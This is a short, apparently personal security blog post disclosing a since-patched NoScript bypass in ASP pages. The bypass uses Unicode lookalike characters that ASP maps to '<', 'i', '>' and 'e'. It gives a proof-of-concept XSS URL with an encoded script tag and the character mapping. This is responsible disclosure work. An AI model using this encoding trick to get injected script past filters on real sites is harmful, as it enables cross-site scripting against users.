Tag Archives: NoScript bypass in ASP

NoScript New Bypass Method by Unicode in ASP

Update:

NoScript v2.0.2.3 does not have this problem anymore. I’m happier now. tnx to its clever author.

As I told Giorgio, all the problems will be reported to him first ;) 

Woohoo! You/We/They/or whatever! can still use unicode in some places!

NoScript cannot find out special unicode characters which mean something in ASP:

PoC:

http://Example.com/VulnFile.asp?DangInput=%u2329scr%u0131pt%u232A%u212Fval(‘alert’%2b'(“NoScript Bypass in ASP!\\nBy Soroush Dalili”)’)%u2329/scr%u0131pt%u232A

In this example I selected the characters from: http://rishida.net/scripts/uniview/uniview.php . For instance:
%u2329 = <
%u0131 = i
%u232A = >
%u212F = e
From Microsoft point of view! Therefore, IE8 XSS prevention can detect this encoding and NoScript cannot detect it.